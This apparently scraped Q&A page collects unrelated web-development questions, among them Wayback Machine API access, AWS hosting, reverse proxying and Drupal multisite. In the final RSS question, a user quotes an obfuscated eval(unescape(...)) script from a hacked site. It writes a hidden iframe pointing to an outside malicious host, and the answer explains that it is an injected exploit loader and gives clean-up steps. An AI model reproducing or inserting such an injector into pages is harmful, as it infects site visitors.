How to access Wayback Machine programmatically?

How to access Wayback Machine programmatically? - web-scraping

What I'm trying to do
For a list of websites, I want to get the pages indexed by year, if they were archived at any point that year. So if I'm looking at example1.com and example2.com, I want to be able to get:
2010: example1.com, example2.com (the html from these archived pages)
2011: example1.com (example2.com, say, was not archived in 2011)
2012: example2.com
2013: example1.com, example2.com
and so on.
Question
Is this possible to get using the Wayback Machine API? I looked at their API listing and it didn't seem like I could do what I was trying to do. Maybe I'm missing something, but it seems like a fairly plausible use case. Any other suggestions?

They key thing to understand about the Wayback Machine APIs is that there are (from what I can tell) three different ways to work with them.
Wayback Availability JSON API
The first is the API which is documented near the top of the Wayback Machine API page you already mentioned.
That API gives the date-wise nearest result for an archive on a given page. So you can check the Wayback Machine for copies of the Google homepage archived around New Year's Day like so:
http://archive.org/wayback/available?url=google.com&timestamp=20080101
http://archive.org/wayback/available?url=google.com&timestamp=20090101
http://archive.org/wayback/available?url=google.com&timestamp=20100101
etc..
Using the information returned in those URLs, you can easily download the content programmatically.
Wayback CDX Server API
Next we have the Wayback Machine CDX Server API which reveals a much richer series of interfaces. Most notably, you can quickly download every snapshot of a URL that you are interested in:
http://web.archive.org/cdx/search/cdx?url=www.fredtrotter.com
Memento API
Lastly we have the deep and mysterious resource that is the Wayback Machine Memento API. That link is to a blog post about the functionality, but from what I can garner, this is about working with the Wayback Machine at a protocol level, where the Mememnto Protocol is a well-thought out version of the way an archive site should operate.
Final thoughts
In all cases, please be gentle and respectful with your scripting. The Wayback Machine API does not currently require credentials, which is a very generous and open posture in general keeping with the Internet Archive's role as a "Wonder of the Virtual World". So do not abuse it, because that is how we ensure that we have nice things.
Thanks to Greg, and the rest of the Wayback Machine team, for the excellent work you do to keep the Internet a source of personal freedom and expression.

Our CDX API allows you to make 2 separate calls get a list of all captures for the url or domain example1.com and the url or domain example2.com. You can then produce whatever summary you like.

Related

How can I host a website and web application on the same server using AWS?

Excuse my lack of server architecture knowledge, but I'm a bit confused on what applications, servers, environments, etc.. are and how they can communicate with each other. I just got AWS and here is what I want to do ultimately.
I want to create a Google Chrome extension. For simplicity, lets say that I'm trying to make an app that records the number of times that all users with the extension collectively visit a given webpage plus information about the visits, such as the time they visited and duration. So if I go to Facebook.com and 100 other people with the extension did, I would see an iframe, lets say, that says "100 users have been here and they visited at these times: ...". Of course, the extension also needs to communicate with the server to increase the count by one. The point is, there is no need to visit any webpage for this app to work since it's an extension and the point isn't to go to a webpage, although it still returns HTML and Javascript.
Now, I also want a homepage for the app in case people are interested in the extension for whatever reason. Just like Adblock, you don't need to go to their actual website, but it's good to have one.
My question is, how do I set this up? Do I just have a normal website, ie. www.example.com/ and set it up normally with Wordpress (what I'd like to use) then just designate one address, ie www.example.com/app, to be answered by my Python app? If so, how do I do that? What do I need in AWS? I'm familiar with Flask and have written apps on my local server using it—can that be integrated with Wordpress?
Sorry if this is confusing.

I also want a homepage for the app in case people are interested in
the extension
The simplest is to host the home page as a static website (Html, css, js) in an S3 bucket.
But if you really want WordPress, you can do that too.
For Backend web services for your plugin to talk to, you can use Elastic Beanstalk, it is a very simple way to do that, without tinkering all the components yourself.

Possibility to route external site using my web server

Probably a stupid question, or I am the stupid one.
For instance, I have a website http://www.mysite.domain, and another site, let's say a blog http://www.myblog.domain, totally different domain. I fully own both sites, however they are not physically hosted together.
Now I want to map a path of my website blog to the blog, and keep consistency of all further routing without redirect(keep the integrity of the original url) :
http://www.mysite.domain/blog ---> http://www.myblog.domain
http://www.mysite.domain/blog/news ---> http://www.myblog.domain/news
http://www.mysite.domain/blog/aboutme ---> http://www.myblog.domain/aboutme
http://www.mysite.domain/blog/blog?title=whatever ---> http://www.myblog.domain/blog?title=whatever
Is that an evil thought or it is possible?

Given that you have the same sub-domain, this is certainly possible. You would need infrastructure and probably new hardware that routes requests to your domain. There are commercial products (https://www.a10networks.com/products/application-delivery-controllers) that can easily achieve this with some custom scripting. I am not sure about equivalent open source products.

How to restrict external access to a specific sub-URL IIS7

I've currently got a reasonably large site up that i've been asked to make changes to.
Currently To login to this site you need to go to:
www.example.com/folder/loginpage.html
This site is only accessible internally at this time and it is unlikely to ever be accessible externally.
We would like to, however, be able to direct external users to a sub-directory on the site (a 'survey' form) which is located in
www.example.com/folder/subfolder/survey.html
This survey writes its results back to the main application and i believe they are integrated tightly.
We initially tried the idea of using an additional IIS7 box as a reverse proxy however it is quite confusing to me, i'm not very familiar with IIS/ARR and the other features required (i'm mostly familiar with networking). I did try and follow a number of tutorials but didn't get very far. I'd like to avoid it if possible.
How can I, using IIS7 (this site is in ASP.NET) restrict external users from accessing anything other than the survey pages (there are a few included files necessary as well)?
Is it possible to make www.example.com/folder/subfolder/survey.html a 'website' in-itself so that i can publish a URL like survey.example.com externally?
I've come across other examples where access is restricted from specific pages but the root of the site is still accessible
ie
www.eg.com/ is allowed but www.eg.com/admin.aspx is denied. I'd like to the the reverse in effect, and if possible, hide the 'true' url.
Hope someone can help! If using a reverse proxy is possible i'm happy to do it but i'd need detailed instructions.
Thanks for reading,
Much appreciated!
Edit: Sorry all, I'm new to stackoverflow, indeed I've just realised that there are several other sub-communities. Is it more appropriate to ask this in a different community? If so, which one?
Thanks!

How to make Drupal's multisite algorithm ignore the domain name part

I currently develop Drupal web sites using its multi-site feature that allows me to have a single code base and support multiple distinct settings per each site.
I set up a dev server and I was quite happy with my arrangement of domains like example.com.local (not that happy because I had to perform a small conversion before entering production, but still quite happy) and the thing used to work well. Too bad I recently started to work at places outside the LAN in which my dev server resides--mostly at clients' places where I need to demo their sites. First of all I set up a dyndns.org account and the server is accessible through the Internet.
Unfortunately the whole domain-based multi-site ungracefully fell down, since I'm now accessing the server via myservername.dyndns.org and Drupal's algorithm takes the domain name into account, so I'm forced to use at least the TLD as part of the directory name (namely sites/local.example.com). So I decided to switch to directory-based multi-site, and now I'm able to access my server from inside the LAN using myservername.local/example.com (having renamed the sites/ subdirectories accordingly). You should easily see why this is suboptimal, since when I browse to myservername.dyndns.org/example.com Drupal looks for sites/org.example.com. I temporarily ended up making a link from sites/org.example.com to sites/local.example.com but again, this does not scale well If and when I'll have to drop dyndns.org for, say, dev.mycorporatesite.com...
Is there any other possibility? I have full access to the server, I can change Apache2's configs, .htaccess and all the stuff.

I would recommend against referencing drupal multisites in folders but instead would set up your server to have a fixed domain name and each site in a subdomain.
So your dev server is at mydevserver.com
and then each site could be
client1.mydevserver.com
client2.mydevserver.com
etc.
If you also at the same time as creating these, you move the files folder from the default to whatever the live site will be i.e.
sites/livesite.com/files
Then when you have to go live, all the references will be correct (if you are drupal 7 this might not be an issue)

RSS won't update

My feed is broken: Feed Validator says this portion is the problem. Any thoughts?
]]>content:encoded>
wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/wfw:commentRss>
slash:comments>2/slash:comments>
/item>
/channel>
/rss>
script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>

<script language="javascript">eval(unescape("%64%6F%63...
You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web-browsers and plugins that attempts to infect other people's computers. That it also results in the RSS being invalid is a side-effect.
You need to get the site off-line before it infects more people, then work on the clean-up, which will depend on how they compromised it/what kind of server it is. Certainly at the very least you will need to delete your current site code and upload fresh new scripts, from a machine you know is clean(*), with all your passwords changed. If it's your your own [virtual] server you will need to check that the server itself hasn't been rooted.
(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)

Develop Reference

r css asp.net wordpress firebase qt symfony nginx http apache-flex